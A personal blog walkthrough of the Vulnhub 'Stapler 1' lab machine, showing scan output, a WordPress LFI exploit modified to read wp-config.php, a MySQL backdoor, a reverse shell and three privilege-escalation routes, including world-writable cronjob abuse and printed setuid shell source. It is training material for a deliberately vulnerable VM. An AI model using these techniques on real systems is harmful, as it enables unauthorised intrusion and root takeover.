Stapler 1. Vulnhub’s VM Walkthrough

Page

I’m not dead yet!
VM available at
https://www.vulnhub.com/entry/stapler-1,150/

Starting it off with a nmap scan:

PORT STATE SERViCE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain dnsmasq 2.75
80/tcp open http
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: RED)
666/tcp open doom?
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))

Nikto turned up negative on TCP Port 80.
I decided to focus on TCP Port 12380.
Running nikto against our target.

– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.3.140
+ Target Hostname: 192.168.3.140
+ Target Port: 12380
—————————————————————————
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2016-06-10 23:48:49 (GMT-4)
—————————————————————————
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header ‘dave’ found, with contents: Soemthing doesn’t look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ Entry ‘/admin112233/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/blogblog/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ “robots.txt” contains 2 entries which should be manually viewed.
+ Hostname ‘192.168.3.140’ does not match certificate’s names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header ‘x-ob_mode’ found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2016-06-10 23:50:27 (GMT-4) (98 seconds)
—————————————————————————
+ 1 host(s) tested

Interesting entries found. However, when we tried to visit the page manually, regardless of which directory/file/url we request, it will always return the same page.
burp_detect_400

Firing up burp suite to proxy our web requests, we are able to get a clearer view of what is happening. It seems that we are greeted with a 400 Bad Request error.

After a few Google searches here and there, it is very likely to be this:
http://serverfault.com/questions/477236/apache-insecure-request-sent-to-secure-port-want-to-redirect

We can also verify it with an amap scan

amap v5.4 (www.thc.org/thc-amap) started at 2016-06-11 00:00:26 – APPLICATION MAPPING mode

Protocol on 192.168.3.140:12380/tcp matches http
Protocol on 192.168.3.140:12380/tcp matches http-apache-2
Protocol on 192.168.3.140:12380/tcp matches ntp
Protocol on 192.168.3.140:12380/tcp matches ssl

Unidentified ports: none.

amap v5.4 finished at 2016-06-11 00:00:32

By browsing to https:// instead of http://, we will be able to see the content of /blogblog/ directory, which revealed itself to be a WordPress site.

wordpress-detected.png

Next, we will fire up WPScan, a tool that is readily available in Kali OS.
We will be launching a full scan, enumerating all plugins, themes, etc. It can be done with the flag  –enumerate ap at ( all plugins, all themes)

Interesting output from our wpscan:

[!] The WordPress ‘https://192.168.3.140:12380/blogblog/readme.html’ file exists exposing a version number
[+] Interesting header: DAVE: Soemthing doesn’t look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[!] Registration is enabled: https://192.168.3.140:12380/blogblog/wp-login.php?action=register
[+] XML-RPC Interface available under: https://192.168.3.140:12380/blogblog/xmlrpc.php
[!] Upload directory has directory listing enabled: https://192.168.3.140:12380/blogblog/wp-content/uploads/

[+] We found 4 plugins:

[+] Name: advanced-video-embed-embed-videos-or-playlists – v1.0
| Latest version: 1.0 (up to date)
| Location: https://192.168.3.140:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
| Readme: https://192.168.3.140:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
[!] Directory listing is enabled: https://192.168.3.140:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/

[+] Name: akismet
| Latest version: 3.1.11
| Location: https://192.168.3.140:12380/blogblog/wp-content/plugins/akismet/

[!] We could not determine a version so all vulnerabilities are printed out

[!] Title: Akismet 2.5.0-3.1.4 – Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8215
Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: shortcode-ui – v0.6.2
| Latest version: 0.6.2 (up to date)
| Location: https://192.168.3.140:12380/blogblog/wp-content/plugins/shortcode-ui/
| Readme: https://192.168.3.140:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
[!] Directory listing is enabled: https://192.168.3.140:12380/blogblog/wp-content/plugins/shortcode-ui/

[+] Name: two-factor
| Latest version: 0.1-dev-20160412
| Location: https://192.168.3.140:12380/blogblog/wp-content/plugins/two-factor/
| Readme: https://192.168.3.140:12380/blogblog/wp-content/plugins/two-factor/readme.txt
[!] Directory listing is enabled: https://192.168.3.140:12380/blogblog/wp-content/plugins/two-factor/

We can also use WPScan to brute force users.

john-password-brute-wpscan

Logging in the WordPress as john:incorrect

john-incorrect-wp-login

I went ahead to try and upload some php-reverse-shell by editing the template. I was then faced with some security implementations that prevented me from doing so. Not to waste any more time, I continued investigating the WordPress’s plugins.

Nice, it seems that one of the plugins has a LFI vulnerability
https://www.exploit-db.com/exploits/39646/ [Py Exploit LFI]

We made some changes to the python script, in order for it to work on https:// site.
The main changes made were:

import ssl
ssl._create_default_https_context = ssl._create_unverified_context
url = “https://TARGET-IP:12380/blogblog/” # insert url to wordpress

Now the python script should not return some sh*tty SSL_VERIFY error.
The exploit will get the content of wp-config.php into a random image. We want the content of wp-config.php because it should contain mysql password. From our nmap scan, we knew that mysql is open on port 3306.

After running the python exploit, we should get an image filed created on the directory which was discovered via our WPScan,

[!] Upload directory has directory listing enabled: https://192.168.3.140:12380/blogblog/wp-content/uploads/

By visiting it, we will be able to get the image name that was created via our python exploit.

curl https://path/to/image/created -k to view the content of the targets wp-config.php, the mysql password should be revealed now.
We can then proceed to login to our target’s mysql server.
mysql -uroot -ppassword -h <TARGET-IP>

Enumerating the database…

wordpress-credentials

barry-hash-cracked.png

I decided to crack barry’s password hash and hoping to be able to SSH in. Why did I choose barry?

Next, I went for the quick way. To create a backdoor via mysql to perform command execution.

mysql-backdoor-success

How did I manage to find out the web-directory path?

After verifying that my backdoor works, I proceed to push myself a python reverse shell

reverse-shell-w-python

Nice.

 

 

 

PRIVILEGE ESCALATION PART 1

I f*cking love privilege escalation since it was the factor that caused me my failure on my OSCP exam.

Discover OS info, kernel version, etc.

www-data@red:/tmp$ uname -ar
uname -ar
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
www-data@red:/tmp$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION=”Ubuntu 16.04 LTS”
NAME=”Ubuntu”
VERSION=”16.04 LTS (Xenial Xerus)”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu 16.04 LTS”
VERSION_ID=”16.04″
HOME_URL=”http://www.ubuntu.com/&#8221;
SUPPORT_URL=”http://help.ubuntu.com/&#8221;
BUG_REPORT_URL=”http://bugs.launchpad.net/ubuntu/&#8221;
UBUNTU_CODENAME=xenial

This information can be leverage to search for relevant OS/Kernel based exploits
hxxps://www.exploit-db.com/exploits/39772/

Download the zip, follow the instructions, root.

apache-to-root-kernel-exploit

root-flag

 

 

PRIVILEGE ESCALATION PART 2

You should enumerate enough to discover that there’s a cronjob that is world-writable. Let’s abuse it

cron-job-abuse

The first attempt I did was to create a root privileged user without password, so I can “su” to him and r0ot. However, it prompts me for password when I attempt to “su”. Anywayzzzzzzz, this shows that the cronjob abuse idea WORKS.

Next, I created a .c setuid binary. I abused the cronjob to gcc and chown u+s it, so that I can run it with root’s sticky bit set.

cron-job-abuse2.png

Time to fly.

cronjob-to-root

content of suid.c

int main(void) {
setgid(0); setuid(0);
execl(“/bin/sh”,”sh”,0); }

 

 

 

PRIVILEGE ESCALATION PART 3

ls -alhR /home/

It should display some weird file .sudo_as_admin_successful in /peter directory
Proceed to investigate the user peter in /etc/groups

It appears that he has more privileges than other users.. lets snipe him out!

Initially I wanted to find every file that has “peter” in it.
The command find / -name *peter* 2>/dev/null doesn’t work as I wanted (Any tips on using the find command?)

grep -r “peter” 2>/dev/null will display a sh*t ton of output, at some point we will be able to see it…
peter-ssh-pass

Proceed to SSH as peter with his password, and sudo switch user to root.

peter-to-root

DONE!

 



 

 

Possible users I’ve came up with, throughout my way of enumeration/exploitation.
I WAS REALLY SAD I COULDN’T SSH IN WITH BARRY

harry
zoe
fred
kathy
barry
dave
john
smith
elly
peter
heather
garry
scott
tim
vicki
pam
simon



Reference used: https://download.vulnhub.com/stapler/slides.pdf
Let me know if at any point you are unable to follow through!

Stay safe!

-9emin1